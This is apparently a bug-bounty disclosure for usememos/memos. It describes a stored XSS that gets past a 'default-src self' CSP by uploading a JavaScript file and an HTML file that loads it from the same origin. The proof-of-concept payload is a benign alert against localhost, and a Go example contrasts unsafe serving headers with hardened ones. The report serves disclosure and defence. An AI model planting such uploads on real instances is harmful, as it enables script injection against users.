Stored XSS with CSP bypass through JS file upload in usememos/memos
Valid
Reported on Dec 26th 2022
Description
I've seen at https://github.com/usememos/memos/blob/main/server/resource.go#L268 that the CSP "default-src 'self'" is set on served resources.
This configuration can be bypassed if I'm able to upload a JS file and then reference it from another uploaded file: both are served from the same origin, so the script source satisfies 'self' and is allowed to run.
Proof of Concept
- Upload a first file to the resources, test.js, containing:
alert(document.domain);
- Now get the link of this uploaded file, which for me is:
http://localhost:5230/o/r/12/test.js
- Now upload an HTML file that loads that URL, made like this:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>Test</title>
<script src="http://localhost:5230/o/r/12/test.js"></script>
</head>
<body>
</body>
</html>
- Now get the link to this HTML file, which for me is:
http://localhost:5230/o/r/14/test.html
- Open the file in the browser: the HTML is rendered on the application origin, the same-origin script passes the 'self' check and the alert fires.
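The steps above reduce to one server-side property: a user upload is rendered inline on the application origin, so a CSP of "default-src 'self'" cannot distinguish it from the application's own scripts. The Go program below is an added example, not code from the memos project or from the report; the in-memory store, the two uploads, the numeric ids 12 and 14 and the /o/r/<id>/<filename> route are assumptions modelled on the report's URLs. It serves the same two files first with the weak headers the report describes and then with a hardened set (forced download, nosniff, active types downgraded to text/plain, a sandboxing CSP), and a small check reports whether a browser would render each response as an active document.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// resource is a constructed stand-in for an uploaded file; memos' real
// storage model is not reproduced here.
type resource struct {
	filename string
	mime     string
	body     []byte
}

// store holds the two uploads from the report, keyed by the numeric id that
// appears in its /o/r/<id>/<filename> URLs (ids assumed, not from a real instance).
var store = map[string]resource{
	"12": {"test.js", "text/javascript", []byte("alert(document.domain);")},
	"14": {"test.html", "text/html", []byte(
		`<!DOCTYPE html><html><head><script src="/o/r/12/test.js"></script></head><body></body></html>`)},
}

// lookup resolves /o/r/<id>/<filename> against the store.
func lookup(p string) (resource, bool) {
	parts := strings.Split(strings.Trim(p, "/"), "/")
	if len(parts) != 4 || parts[0] != "o" || parts[1] != "r" {
		return resource{}, false
	}
	res, ok := store[parts[2]]
	if !ok || res.filename != parts[3] {
		return resource{}, false
	}
	return res, true
}

// serveWeak reproduces the pattern the report describes: the upload is
// rendered inline on the application origin with only "default-src 'self'",
// so a second upload on the same origin satisfies 'self' and executes.
func serveWeak(w http.ResponseWriter, r *http.Request) {
	res, ok := lookup(r.URL.Path)
	if !ok {
		http.NotFound(w, r)
		return
	}
	w.Header().Set("Content-Security-Policy", "default-src 'self'")
	w.Header().Set("Content-Type", res.mime)
	w.Write(res.body)
}

// serveHardened is one defensive shape for user uploads: force a download,
// forbid sniffing, serve active types as plain text and sandbox whatever a
// browser still chooses to render. Hosting uploads on a separate origin is
// the stronger fix and is outside this snippet.
func serveHardened(w http.ResponseWriter, r *http.Request) {
	res, ok := lookup(r.URL.Path)
	if !ok {
		http.NotFound(w, r)
		return
	}
	mime := res.mime
	if isActive(mime) {
		mime = "text/plain; charset=utf-8"
	}
	w.Header().Set("Content-Type", mime)
	w.Header().Set("X-Content-Type-Options", "nosniff")
	w.Header().Set("Content-Disposition", fmt.Sprintf("attachment; filename=%q", res.filename))
	w.Header().Set("Content-Security-Policy", "default-src 'none'; sandbox")
	w.Write(res.body)
}

// isActive lists content types a browser executes as a document or script.
func isActive(ct string) bool {
	ct = strings.ToLower(strings.TrimSpace(strings.Split(ct, ";")[0]))
	switch ct {
	case "text/html", "application/xhtml+xml", "image/svg+xml",
		"text/javascript", "application/javascript":
		return true
	}
	return false
}

// rendersInline reports whether a 200 response would be rendered in-page as
// an active document: no attachment disposition and an active content type.
func rendersInline(resp *http.Response) bool {
	cd := strings.ToLower(resp.Header.Get("Content-Disposition"))
	return resp.StatusCode == http.StatusOK &&
		!strings.HasPrefix(cd, "attachment") &&
		isActive(resp.Header.Get("Content-Type"))
}

// probe issues an in-process GET against a handler and returns the response.
func probe(h http.HandlerFunc, p string) *http.Response {
	rec := httptest.NewRecorder()
	h(rec, httptest.NewRequest(http.MethodGet, p, nil))
	return rec.Result()
}

func main() {
	for _, p := range []string{"/o/r/12/test.js", "/o/r/14/test.html"} {
		fmt.Printf("%-18s weak renders inline: %-5v hardened renders inline: %v\n",
			p, rendersInline(probe(serveWeak, p)), rendersInline(probe(serveHardened, p)))
	}
}
```

The check is deliberately header-based: the CSP value on its own is not what decides the outcome, the combination of inline disposition, an active Content-Type and shared origin is. The `sandbox` directive is kept in the hardened variant as defence in depth for viewers that ignore Content-Disposition; it also gives the response an opaque origin, so even a rendered copy cannot read the application's cookies or DOM.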
Impact
It is possible to obtain a stored XSS on the application origin that bypasses the CSP currently implemented.